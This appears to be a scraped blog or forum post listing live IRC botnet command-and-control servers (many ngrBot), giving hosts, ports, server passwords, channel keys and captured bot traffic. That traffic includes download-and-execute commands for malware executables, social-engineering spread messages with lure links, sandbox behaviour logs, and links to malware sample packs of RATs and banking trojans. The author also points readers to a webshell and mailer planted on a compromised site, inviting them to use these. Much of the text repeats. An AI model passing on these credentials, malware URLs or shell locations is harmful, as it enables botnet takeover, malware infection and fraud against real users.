kayits.byinter.net(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)
found by tr0j3n
Remote Host Port Number
kayits.byinter.net 7107
NICK new[iRooT-XP-USA]667657
USER 3221 "" "TsGh" :3221
JOIN #!MSN! Coded
NICK [iRooT-XP-USA]008675
USER 0086 "" "TsGh" :0086
NICK [iRooT-XP-USA]049882
USER 0498 "" "TsGh" :0498
hosting infos:
http://whois.domaintools.com/94.102.1.163
Remote Host Port Number
kayits.byinter.net 7107
NICK new[iRooT-XP-USA]667657
USER 3221 "" "TsGh" :3221
JOIN #!MSN! Coded
NICK [iRooT-XP-USA]008675
USER 0086 "" "TsGh" :0086
NICK [iRooT-XP-USA]049882
USER 0498 "" "TsGh" :0498
hosting infos:
http://whois.domaintools.com/94.102.1.163
70.107.249.167(irc botnet hosted in United States New York Verizon Online Llc)
70.107.249.167:3921
Nick: A4-647337362958
Username: fpairedpyoqaak
Joined Channel: #mss2 with Password mss2pass
Channel Topic for Channel #mss2: "xvvv mssql 100 0 0 -a -r -s"
i got this info from Seb another botnet lover lol
hosting infos:
http://whois.domaintools.com/70.107.249.167
Nick: A4-647337362958
Username: fpairedpyoqaak
Joined Channel: #mss2 with Password mss2pass
Channel Topic for Channel #mss2: "xvvv mssql 100 0 0 -a -r -s"
i got this info from Seb another botnet lover lol
hosting infos:
http://whois.domaintools.com/70.107.249.167
qeshmjaa.zapto.org(desperate albanian hecker hosting botnet in Ireland Dublin Digiweb Ltd)
Remote Host Port Number
qeshmjaa.zapto.org 4244
NICK [iRooT-XP-USA]211081
USER 2110 "" "TsGh" :2110
JOIN #gan# sk
NICK new[iRooT-XP-USA]709534
USER 7095 "" "TsGh" :7095
NICK [iRooT-XP-USA]664288
USER 6642 "" "TsGh" :6642
hosting infos:
http://whois.domaintools.com/78.137.159.84
qeshmjaa.zapto.org 4244
NICK [iRooT-XP-USA]211081
USER 2110 "" "TsGh" :2110
JOIN #gan# sk
NICK new[iRooT-XP-USA]709534
USER 7095 "" "TsGh" :7095
NICK [iRooT-XP-USA]664288
USER 6642 "" "TsGh" :6642
hosting infos:
http://whois.domaintools.com/78.137.159.84
22mb malware samples
size 22mb
diferent malware samples inside
have fun reversing
Download:
http://8efc580b.tubeviral.com
diferent malware samples inside
have fun reversing
Download:
http://8efc580b.tubeviral.com
tinker.weedns.com(irc botnet Mouse's net again)
Remote Host Port Number
tinker.weedns.com 3305 PASS secretpass
Resolved : [tinker.weedns.com] To [173.9.72.212]
Resolved : [tinker.weedns.com] To [222.124.178.155]
Resolved : [tinker.weedns.com] To [66.238.151.86]
Resolved : [tinker.weedns.com] To [188.165.200.48]
Resolved : [tinker.weedns.com] To [74.210.208.163]
NICK yf69xrls6
USER rb6c2qqku * 0 :USA|XP|115
JOIN #mm RSA
Topic On: [ #mm ] [ +yOfS7/ZgRdB.u97R71RybXB/ubyOC/gLWja.029Cg1ae4NB/TcaF4.m9cnf/dRE2M0IU0Az0JjgIw/Pu691.6bET91ANj0U. ]
tinker.weedns.com 3305 PASS secretpass
Resolved : [tinker.weedns.com] To [173.9.72.212]
Resolved : [tinker.weedns.com] To [222.124.178.155]
Resolved : [tinker.weedns.com] To [66.238.151.86]
Resolved : [tinker.weedns.com] To [188.165.200.48]
Resolved : [tinker.weedns.com] To [74.210.208.163]
NICK yf69xrls6
USER rb6c2qqku * 0 :USA|XP|115
JOIN #mm RSA
Topic On: [ #mm ] [ +yOfS7/ZgRdB.u97R71RybXB/ubyOC/gLWja.029Cg1ae4NB/TcaF4.m9cnf/dRE2M0IU0Az0JjgIw/Pu691.6bET91ANj0U. ]
193.107.16.111(irc botnet hosted in Seychelles Ideal Solution Ltd)
Remote Host Port Number
193.107.16.111 7654 PASS ngrBot
213.251.170.52 80
66.45.255.234 80
NICK n{US|XPa}cucqohu
USER cucqohu 0 0 :cucqohu
JOIN #oldgold noKIDs
PRIVMSG #oldgold :[d="http://gloimpsa.com/js/expressInstall.swf.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Fdxaxf.exe" - Download retries: 0
hosting infos:
http://whois.domaintools.com/193.107.16.111
193.107.16.111 7654 PASS ngrBot
213.251.170.52 80
66.45.255.234 80
NICK n{US|XPa}cucqohu
USER cucqohu 0 0 :cucqohu
JOIN #oldgold noKIDs
PRIVMSG #oldgold :[d="http://gloimpsa.com/js/expressInstall.swf.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Fdxaxf.exe" - Download retries: 0
hosting infos:
http://whois.domaintools.com/193.107.16.111
91.215.159.137(irc botnet hosted in Netherlands Amsterdam Infinite Technologies Internet Solutions Limited)
Remote Host Port Number
112.78.8.20 80
195.122.131.3 80
213.251.170.52 80
91.215.159.137 1866 PASS ngrBot
PRIVMSG #!hot! :[DNS]: Blocked 1259 domain(s) - Redirected 0 domain(s)
PRIVMSG #!hot! :[d="http://rapidshare.com/files/2997295683/nap.exe"] Error downloading file [e="12039"]
NICK n{US|XPa}aytockz
USER aytockz 0 0 :aytockz
JOIN #!hot! ngrBot
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to "5"
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread message to "LOL http://jardincaracolito.edu.co/facebook-profile-pic-r9k5w9_JPG"
PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to "5"
PRIVMSG #!hot! :[MSN]: Updated MSN spread message to "LOL http://jardincaracolito.edu.co/facebook-profile-pic-u9v2e9_JPG"
hosting infos:
http://whois.domaintools.com/91.215.159.137
112.78.8.20 80
195.122.131.3 80
213.251.170.52 80
91.215.159.137 1866 PASS ngrBot
PRIVMSG #!hot! :[DNS]: Blocked 1259 domain(s) - Redirected 0 domain(s)
PRIVMSG #!hot! :[d="http://rapidshare.com/files/2997295683/nap.exe"] Error downloading file [e="12039"]
NICK n{US|XPa}aytockz
USER aytockz 0 0 :aytockz
JOIN #!hot! ngrBot
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to "5"
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread message to "LOL http://jardincaracolito.edu.co/facebook-profile-pic-r9k5w9_JPG"
PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to "5"
PRIVMSG #!hot! :[MSN]: Updated MSN spread message to "LOL http://jardincaracolito.edu.co/facebook-profile-pic-u9v2e9_JPG"
hosting infos:
http://whois.domaintools.com/91.215.159.137
c0re.su(irc botnet hosted in Russian Federation Mir Telematiki Ltd)
Remote Host Port Number
c0re.su 4443
NICK N[USA|XP][yiowryo]
USER yiow "" "lol" :yiow
JOIN #b0ts
NICK N[USA|XP][uuobuyk]
USER uuob "" "lol" :uuob
NICK [USA-XP][ftlizjn]
USER 2844 "" "TsGh" :2844
JOIN #botz
NICK [USA-XP][qirnfam]
USER 9143 "" "TsGh" :9143
NICK [n][USA-XP][ihcnykp]
USER 2550 "" "TsGh" :2550
hosting infos:
http://whois.domaintools.com/46.17.100.229
c0re.su 4443
NICK N[USA|XP][yiowryo]
USER yiow "" "lol" :yiow
JOIN #b0ts
NICK N[USA|XP][uuobuyk]
USER uuob "" "lol" :uuob
NICK [USA-XP][ftlizjn]
USER 2844 "" "TsGh" :2844
JOIN #botz
NICK [USA-XP][qirnfam]
USER 9143 "" "TsGh" :9143
NICK [n][USA-XP][ihcnykp]
USER 2550 "" "TsGh" :2550
hosting infos:
http://whois.domaintools.com/46.17.100.229
92.241.165.115(irc botnet hosted in Russian Federation Oao Webalta)
Remote Host Port Number
213.251.170.52 80
92.241.165.115 1863 PASS ngrBot
NICK n{US|XPa}qgaqcrq
USER qgaqcrq 0 0 :qgaqcrq
JOIN #start romeo
Now talking in #start
Topic On: [ #start ] [ *mdns http://www.abbygamerz.net/foro/index *msn.int 5 *msn.set viste las fotos nuevas de mi facebook? http://adf.ly/1gYW7 ]
Topic By: [ ecu ]
hosting infos:
http://whois.domaintools.com/92.241.164.67
213.251.170.52 80
92.241.165.115 1863 PASS ngrBot
NICK n{US|XPa}qgaqcrq
USER qgaqcrq 0 0 :qgaqcrq
JOIN #start romeo
Now talking in #start
Topic On: [ #start ] [ *mdns http://www.abbygamerz.net/foro/index *msn.int 5 *msn.set viste las fotos nuevas de mi facebook? http://adf.ly/1gYW7 ]
Topic By: [ ecu ]
hosting infos:
http://whois.domaintools.com/92.241.164.67
115.239.230.73(irc botnet hosted in China Zhejiang Ninbo Lanzhong Network Ltd)
Remote Host Port Number
115.239.230.73 6943 PASS laorosr
213.251.170.52 80
31.184.237.43 80
98.126.35.112 80
MODE [N00_USA_XP_1295223]
@ -ix
00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000020 | 505F 3132 3935 BCB9 4020 3A20 5261 6E64 | P_1295..@ : Rand
00000030 | 6F6D 2050 6F72 7420 5363 616E 2073 7461 | om Port Scan sta
00000040 | 7274 6564 206F 6E20 3137 342E 3133 332E | rted on 174.133.
00000050 | 782E 783A 3434 3520 7769 7468 2061 2064 | x.x:445 with a d
00000060 | 656C 6179 206F 6620 3520 7365 636F 6E64 | elay of 5 second
00000070 | 7320 666F 7220 3020 6D69 6E75 7465 7320 | s for 0 minutes
00000080 | 7573 696E 6720 3235 2074 6872 6561 6473 | using 25 threads
00000090 | 2E0D 0A50 5252 564D 5347 205B 4E30 305F | ...PRRVMSG [N00_
000000A0 | 5553 415F 5850 5F31 3239 35BC B940 203A | USA_XP_1295..@ :
000000B0 | 2053 6571 7565 6E74 6961 6C20 506F 7274 | Sequential Port
000000C0 | 2053 6361 6E20 7374 6172 7465 6420 6F6E | Scan started on
000000D0 | 2031 3932 2E31 3638 2E30 2E30 3A34 3435 | 192.168.0.0:445
000000E0 | 2077 6974 6820 6120 6465 6C61 7920 6F66 | with a delay of
000000F0 | 2035 2073 6563 6F6E 6473 2066 6F72 2030 | 5 seconds for 0
00000100 | 206D 696E 7574 6573 2075 7369 6E67 2032 | minutes using 2
00000110 | 3020 7468 7265 6164 732E 0D0A 5052 5256 | 0 threads...PRRV
00000120 | 4D53 4720 5B4E 3030 5F55 5341 5F58 505F | MSG [N00_USA_XP_
00000130 | 3132 3935 BCB9 4020 3A20 5365 7175 656E | 1295..@ : Sequen
00000140 | 7469 616C 2050 6F72 7420 5363 616E 2073 | tial Port Scan s
00000150 | 7461 7274 6564 206F 6E20 3139 322E 3136 | tarted on 192.16
00000160 | 382E 3632 2E30 3A34 3435 2077 6974 6820 | 8.62.0:445 with
00000170 | 6120 6465 6C61 7920 6F66 2035 2073 6563 | a delay of 5 sec
00000180 | 6F6E 6473 2066 6F72 2030 206D 696E 7574 | onds for 0 minut
00000190 | 6573 2075 7369 6E67 2032 3020 7468 7265 | es using 20 thre
000001A0 | 6164 732E 0D0A 5052 5256 4D53 4720 5B4E | ads...PRRVMSG [N
000001B0 | 3030 5F55 5341 5F58 505F 3132 3935 BCB9 | 00_USA_XP_1295..
000001C0 | 4020 3A20 5365 7175 656E 7469 616C 2050 | @ : Sequential P
000001D0 | 6F72 7420 5363 616E 2073 7461 7274 6564 | ort Scan started
000001E0 | 206F 6E20 3139 322E 302E 302E 303A 3434 | on 192.0.0.0:44
000001F0 | 3520 7769 7468 2061 2064 656C 6179 206F | 5 with a delay o
00000200 | 6620 3520 7365 636F 6E64 7320 666F 7220 | f 5 seconds for
00000210 | 3020 6D69 6E75 7465 7320 7573 696E 6720 | 0 minutes using
00000220 | 3130 2074 6872 6561 6473 2E0D 0A4B 4349 | 10 threads...KCI
00000230 | 4B20 5B4E 3030 5F55 5341 5F58 505F 3132 | K [N00_USA_XP_12
00000240 | 3935 3232 335D 18E7 400D 0A72 7373 7220 | 95223]..@..rssr
00000250 | 5350 322D 3238 3520 2A20 3020 3A43 4F4D | SP2-285 * 0 :COM
00000260 | 5055 5445 524E 414D 450D 0A73 656E 6420 | PUTERNAME..send
00000270 | 236A 2C23 4D61 206F 6F6F 6F0D 0A50 5252 | #j,#Ma oooo..PRR
00000280 | 564D 5347 2023 6920 3A48 5454 5020 5345 | VMSG #i :HTTP SE
00000290 | 5420 6874 7470 3A2F 2F33 312E 3138 342E | T http://31.184.
000002A0 | 3233 372E 3433 2F35 356D 732E 6578 650D | 237.43/55ms.exe.
000002B0 | 0A50 5252 564D 5347 205B 4E30 305F 5553 | .PRRVMSG [N00_US
000002C0 | 415F 5850 5F31 3239 35BC B940 203A 2052 | A_XP_1295..@ : R
000002D0 | 616E 646F 6D20 506F 7274 2053 6361 6E20 | andom Port Scan
000002E0 | 7374 6172 7465 6420 6F6E 2031 3734 2E78 | started on 174.x
000002F0 | 2E78 2E78 3A34 3435 2077 6974 6820 6120 | .x.x:445 with a
00000300 | 6465 6C61 7920 6F66 2035 2073 6563 6F6E | delay of 5 secon
00000310 | 6473 2066 6F72 2030 206D 696E 7574 6573 | ds for 0 minutes
00000320 | 2075 7369 6E67 2032 3520 7468 7265 6164 | using 25 thread
00000330 | 732E 0D0A | s...
hosting infos:
http://whois.domaintools.com/115.239.230.73
115.239.230.73 6943 PASS laorosr
213.251.170.52 80
31.184.237.43 80
98.126.35.112 80
MODE [N00_USA_XP_1295223]
@ -ix
00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000020 | 505F 3132 3935 BCB9 4020 3A20 5261 6E64 | P_1295..@ : Rand
00000030 | 6F6D 2050 6F72 7420 5363 616E 2073 7461 | om Port Scan sta
00000040 | 7274 6564 206F 6E20 3137 342E 3133 332E | rted on 174.133.
00000050 | 782E 783A 3434 3520 7769 7468 2061 2064 | x.x:445 with a d
00000060 | 656C 6179 206F 6620 3520 7365 636F 6E64 | elay of 5 second
00000070 | 7320 666F 7220 3020 6D69 6E75 7465 7320 | s for 0 minutes
00000080 | 7573 696E 6720 3235 2074 6872 6561 6473 | using 25 threads
00000090 | 2E0D 0A50 5252 564D 5347 205B 4E30 305F | ...PRRVMSG [N00_
000000A0 | 5553 415F 5850 5F31 3239 35BC B940 203A | USA_XP_1295..@ :
000000B0 | 2053 6571 7565 6E74 6961 6C20 506F 7274 | Sequential Port
000000C0 | 2053 6361 6E20 7374 6172 7465 6420 6F6E | Scan started on
000000D0 | 2031 3932 2E31 3638 2E30 2E30 3A34 3435 | 192.168.0.0:445
000000E0 | 2077 6974 6820 6120 6465 6C61 7920 6F66 | with a delay of
000000F0 | 2035 2073 6563 6F6E 6473 2066 6F72 2030 | 5 seconds for 0
00000100 | 206D 696E 7574 6573 2075 7369 6E67 2032 | minutes using 2
00000110 | 3020 7468 7265 6164 732E 0D0A 5052 5256 | 0 threads...PRRV
00000120 | 4D53 4720 5B4E 3030 5F55 5341 5F58 505F | MSG [N00_USA_XP_
00000130 | 3132 3935 BCB9 4020 3A20 5365 7175 656E | 1295..@ : Sequen
00000140 | 7469 616C 2050 6F72 7420 5363 616E 2073 | tial Port Scan s
00000150 | 7461 7274 6564 206F 6E20 3139 322E 3136 | tarted on 192.16
00000160 | 382E 3632 2E30 3A34 3435 2077 6974 6820 | 8.62.0:445 with
00000170 | 6120 6465 6C61 7920 6F66 2035 2073 6563 | a delay of 5 sec
00000180 | 6F6E 6473 2066 6F72 2030 206D 696E 7574 | onds for 0 minut
00000190 | 6573 2075 7369 6E67 2032 3020 7468 7265 | es using 20 thre
000001A0 | 6164 732E 0D0A 5052 5256 4D53 4720 5B4E | ads...PRRVMSG [N
000001B0 | 3030 5F55 5341 5F58 505F 3132 3935 BCB9 | 00_USA_XP_1295..
000001C0 | 4020 3A20 5365 7175 656E 7469 616C 2050 | @ : Sequential P
000001D0 | 6F72 7420 5363 616E 2073 7461 7274 6564 | ort Scan started
000001E0 | 206F 6E20 3139 322E 302E 302E 303A 3434 | on 192.0.0.0:44
000001F0 | 3520 7769 7468 2061 2064 656C 6179 206F | 5 with a delay o
00000200 | 6620 3520 7365 636F 6E64 7320 666F 7220 | f 5 seconds for
00000210 | 3020 6D69 6E75 7465 7320 7573 696E 6720 | 0 minutes using
00000220 | 3130 2074 6872 6561 6473 2E0D 0A4B 4349 | 10 threads...KCI
00000230 | 4B20 5B4E 3030 5F55 5341 5F58 505F 3132 | K [N00_USA_XP_12
00000240 | 3935 3232 335D 18E7 400D 0A72 7373 7220 | 95223]..@..rssr
00000250 | 5350 322D 3238 3520 2A20 3020 3A43 4F4D | SP2-285 * 0 :COM
00000260 | 5055 5445 524E 414D 450D 0A73 656E 6420 | PUTERNAME..send
00000270 | 236A 2C23 4D61 206F 6F6F 6F0D 0A50 5252 | #j,#Ma oooo..PRR
00000280 | 564D 5347 2023 6920 3A48 5454 5020 5345 | VMSG #i :HTTP SE
00000290 | 5420 6874 7470 3A2F 2F33 312E 3138 342E | T http://31.184.
000002A0 | 3233 372E 3433 2F35 356D 732E 6578 650D | 237.43/55ms.exe.
000002B0 | 0A50 5252 564D 5347 205B 4E30 305F 5553 | .PRRVMSG [N00_US
000002C0 | 415F 5850 5F31 3239 35BC B940 203A 2052 | A_XP_1295..@ : R
000002D0 | 616E 646F 6D20 506F 7274 2053 6361 6E20 | andom Port Scan
000002E0 | 7374 6172 7465 6420 6F6E 2031 3734 2E78 | started on 174.x
000002F0 | 2E78 2E78 3A34 3435 2077 6974 6820 6120 | .x.x:445 with a
00000300 | 6465 6C61 7920 6F66 2035 2073 6563 6F6E | delay of 5 secon
00000310 | 6473 2066 6F72 2030 206D 696E 7574 6573 | ds for 0 minutes
00000320 | 2075 7369 6E67 2032 3520 7468 7265 6164 | using 25 thread
00000330 | 732E 0D0A | s...
hosting infos:
http://whois.domaintools.com/115.239.230.73
42mb malware samples
This package have alot of rats and banking trojans inside
have fun
Download:
http://c3266cfc.tubeviral.com
have fun
Download:
http://c3266cfc.tubeviral.com
irc.raidzone.net(irc botnet hosted in United States Lansing Liquid Web Inc)
50.28.21.18:8890
Nick: New|AUT|1244036|XP
Username: 7665336
Joined Channel: #pedophiliac with Password YDARIO
Remote Host Port Number
50.28.21.18 7659 PASS fuck
NICK [3151|USA|XP|Z3R0x]
USER 3151 "" "lol" :3151
JOIN #pedophiliac YDARIO
PONG 422
hosting infos:
http://whois.domaintools.com/50.28.21.18
Nick: New|AUT|1244036|XP
Username: 7665336
Joined Channel: #pedophiliac with Password YDARIO
Remote Host Port Number
50.28.21.18 7659 PASS fuck
NICK [3151|USA|XP|Z3R0x]
USER 3151 "" "lol" :3151
JOIN #pedophiliac YDARIO
PONG 422
hosting infos:
http://whois.domaintools.com/50.28.21.18
209.172.59.146(ngrBot hosted in Canada Toronto Iweb Technologies Inc)
Remote Host Port Number
209.172.59.146 5794 PASS ngrBot
213.251.170.52 80
74.53.197.4 80
NICK n{US|XPa}pvcbajf
USER pvcbajf 0 0 :pvcbajf
JOIN #butowski ngrBot
PRIVMSG #butowski :[DNS]: Blocked 0 domain(s) - Redirected 15 domain(s)
The data identified by the following URLs was then requested from the remote web server:
http://api.wipmania.com/
http://conectaamor.com/_server/editor/images/dominios.txt
EXE File:
http://conectaamor.com/_server/editor/images/fudnew2.exe
RFI SHELL:
http://conectaamor.com/_server/editor/images/lang.php find the passwd your self
Mailer:
http://conectaamor.com/_server/editor/images/mailer.php servez vous lol
hosting infos:
http://whois.domaintools.com/209.172.59.146
209.172.59.146 5794 PASS ngrBot
213.251.170.52 80
74.53.197.4 80
NICK n{US|XPa}pvcbajf
USER pvcbajf 0 0 :pvcbajf
JOIN #butowski ngrBot
PRIVMSG #butowski :[DNS]: Blocked 0 domain(s) - Redirected 15 domain(s)
The data identified by the following URLs was then requested from the remote web server:
http://api.wipmania.com/
http://conectaamor.com/_server/editor/images/dominios.txt
EXE File:
http://conectaamor.com/_server/editor/images/fudnew2.exe
RFI SHELL:
http://conectaamor.com/_server/editor/images/lang.php find the passwd your self
Mailer:
http://conectaamor.com/_server/editor/images/mailer.php servez vous lol
hosting infos:
http://whois.domaintools.com/209.172.59.146
ziggy.no-ip.org(botnet hosted in Canada Frantech Solutions)
Remote Host Port Number
205.185.122.148 6667 PASS nickz23
205.185.122.148 80
NICK {NEW}[USA][XP-SP2]976017
USER 4242 "" "lol" :4242
PONG :D78F0ECE
JOIN #bots
* The data identified by the following URL was then requested from the remote web server:
o http://ziggy.no-ip.org/lsass.exe
hosting infos:
http://whois.domaintools.com/205.185.122.148
205.185.122.148 6667 PASS nickz23
205.185.122.148 80
NICK {NEW}[USA][XP-SP2]976017
USER 4242 "" "lol" :4242
PONG :D78F0ECE
JOIN #bots
* The data identified by the following URL was then requested from the remote web server:
o http://ziggy.no-ip.org/lsass.exe
hosting infos:
http://whois.domaintools.com/205.185.122.148
jskd6c.jumpingcrab.com(ngrBot hosted in Panama Eric Szopa)
Looks like ngrBot the reptile mod made by fubar and jam3s is spreading alot
Resolved : [jskd6c.jumpingcrab.com] To [184.107.143.126]
Remote Host Port Number
184.107.143.126 2009 and 6667 PASS ngrBot
213.251.170.52 80
70.85.227.66 80
PRIVMSG #root :[HTTP]: Updated HTTP spread message to "juas juaz mira esto bajalo :D http://bit.ly/kgPE5S"
PRIVMSG #root :[d="http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE" s="143360 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0
PONG :irc.sudominio.org
NICK n{US|XPa}rzvzsak
USER rzvzsak 0 0 :rzvzsak
JOIN #root 301189
PRIVMSG #root :[MSN]: Updated MSN spread interval to "1"
PRIVMSG #root :[MSN]: Updated MSN spread message to "jijiji mira :D bajalo :D http://bit.ly/kgPE5S"
PRIVMSG #root :[HTTP]: Updated HTTP spread interval to "1"
* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE
o http://www.befordsouthpointford.com/bfam/llllllllll.EXE
Crypter used to protect the bot:
C:\Users\M4x\Documents\Programmieren\PECRYPT\Client\EXECUTABLE\Loader_Stub\Release\Loader_Stub.pdb
Detection:
2/41 in virustotal
hosting infos:
http://whois.domaintools.com/184.107.143.126
Resolved : [jskd6c.jumpingcrab.com] To [184.107.143.126]
Remote Host Port Number
184.107.143.126 2009 and 6667 PASS ngrBot
213.251.170.52 80
70.85.227.66 80
PRIVMSG #root :[HTTP]: Updated HTTP spread message to "juas juaz mira esto bajalo :D http://bit.ly/kgPE5S"
PRIVMSG #root :[d="http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE" s="143360 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0
PONG :irc.sudominio.org
NICK n{US|XPa}rzvzsak
USER rzvzsak 0 0 :rzvzsak
JOIN #root 301189
PRIVMSG #root :[MSN]: Updated MSN spread interval to "1"
PRIVMSG #root :[MSN]: Updated MSN spread message to "jijiji mira :D bajalo :D http://bit.ly/kgPE5S"
PRIVMSG #root :[HTTP]: Updated HTTP spread interval to "1"
* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE
o http://www.befordsouthpointford.com/bfam/llllllllll.EXE
Crypter used to protect the bot:
C:\Users\M4x\Documents\Programmieren\PECRYPT\Client\EXECUTABLE\Loader_Stub\Release\Loader_Stub.pdb
Detection:
2/41 in virustotal
hosting infos:
http://whois.domaintools.com/184.107.143.126
212.7.214.39(ngrBot hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o)
Remote Host Port Number
195.122.131.9 80
212.7.214.16 80
213.251.170.52 80
212.7.214.39 1866 PASS ngrBot
PRIVMSG #!hot! :[DNS]: Blocked 1269 domain(s) - Redirected 0 domain(s)
PRIVMSG #!hot! :[d="http://rapidshare.com/files/3581947473/jamesbond.exe"] Error downloading file [e="12039"]
NICK n{US|XPa}gshmhma
USER gshmhma 0 0 :gshmhma
JOIN #!hot! ngrBot
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to "5"
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread message to "oh you gotta see this lol http://www.baitbook.net/facebook-profile-pic-9292-JPEG"
PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to "5"
PRIVMSG #!hot! :[MSN]: Updated MSN spread message to "LOL http://www.baitbook.net/facebook-profile-pic-1531-JPEG"
* The data identified by the following URLs was then requested from the remote web server:
o http://rapidshare.com/files/3581947473/jamesbond.exe
o http://212.7.214.16/list.txt
o http://api.wipmania.com/
hosting infos:
http://whois.domaintools.com/212.7.214.39
195.122.131.9 80
212.7.214.16 80
213.251.170.52 80
212.7.214.39 1866 PASS ngrBot
PRIVMSG #!hot! :[DNS]: Blocked 1269 domain(s) - Redirected 0 domain(s)
PRIVMSG #!hot! :[d="http://rapidshare.com/files/3581947473/jamesbond.exe"] Error downloading file [e="12039"]
NICK n{US|XPa}gshmhma
USER gshmhma 0 0 :gshmhma
JOIN #!hot! ngrBot
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to "5"
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread message to "oh you gotta see this lol http://www.baitbook.net/facebook-profile-pic-9292-JPEG"
PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to "5"
PRIVMSG #!hot! :[MSN]: Updated MSN spread message to "LOL http://www.baitbook.net/facebook-profile-pic-1531-JPEG"
* The data identified by the following URLs was then requested from the remote web server:
o http://rapidshare.com/files/3581947473/jamesbond.exe
o http://212.7.214.16/list.txt
o http://api.wipmania.com/
hosting infos:
http://whois.domaintools.com/212.7.214.39
193.106.172.131(ngrBot hosted in Russian Federation Moscow Iqhost Ltd)
Remote Host Port Number
193.106.172.131 1863 PASS ngrBot
213.251.170.52 80
NICK n{US|XPa}hvjyted
USER hvjyted 0 0 :hvjyted
JOIN #80t35ref 1963.g3rb3rs1t0.3691
hosting infos:
http://whois.domaintools.com/193.106.172.131
193.106.172.131 1863 PASS ngrBot
213.251.170.52 80
NICK n{US|XPa}hvjyted
USER hvjyted 0 0 :hvjyted
JOIN #80t35ref 1963.g3rb3rs1t0.3691
hosting infos:
http://whois.domaintools.com/193.106.172.131
12mb malware samples
Mostly botnets and baking trojans
have fun
Download:
http://e422237e.tubeviral.com
have fun
Download:
http://e422237e.tubeviral.com
Worm.Win32.FFAuto.uy
Exe file:
http://123back.com/1.EXE
Java drive by:
http://123back.com/
* The following Host Names were requested from a host database:
o sam.chatsmate.com
o ms.tvchatz.com
o chatsmate.com
o justchatz.com
o tvchatz.com
sam.chatsmate.com
ms.tvchatz.com
chatsmate.com
justchatz.com
UDP Connections
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3001 packet(s) of size 0
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0
Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Taskman" = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Reads HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Taskman"
File Changes by all processes
New Files \Device\RasAcd
C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Opened Files C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
\\.\PIPE\lsarpc
Deleted Files C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Chronological Order Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Set File Attributes: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Copy File: c:\1.EXE to C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Set File Attributes: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe (OPEN_EXISTING)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
hosting infos:
http://whois.domaintools.com/173.248.136.153
http://123back.com/1.EXE
Java drive by:
http://123back.com/
* The following Host Names were requested from a host database:
o sam.chatsmate.com
o ms.tvchatz.com
o chatsmate.com
o justchatz.com
o tvchatz.com
sam.chatsmate.com
ms.tvchatz.com
chatsmate.com
justchatz.com
UDP Connections
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3001 packet(s) of size 0
Remote IP Address: Port: 7202
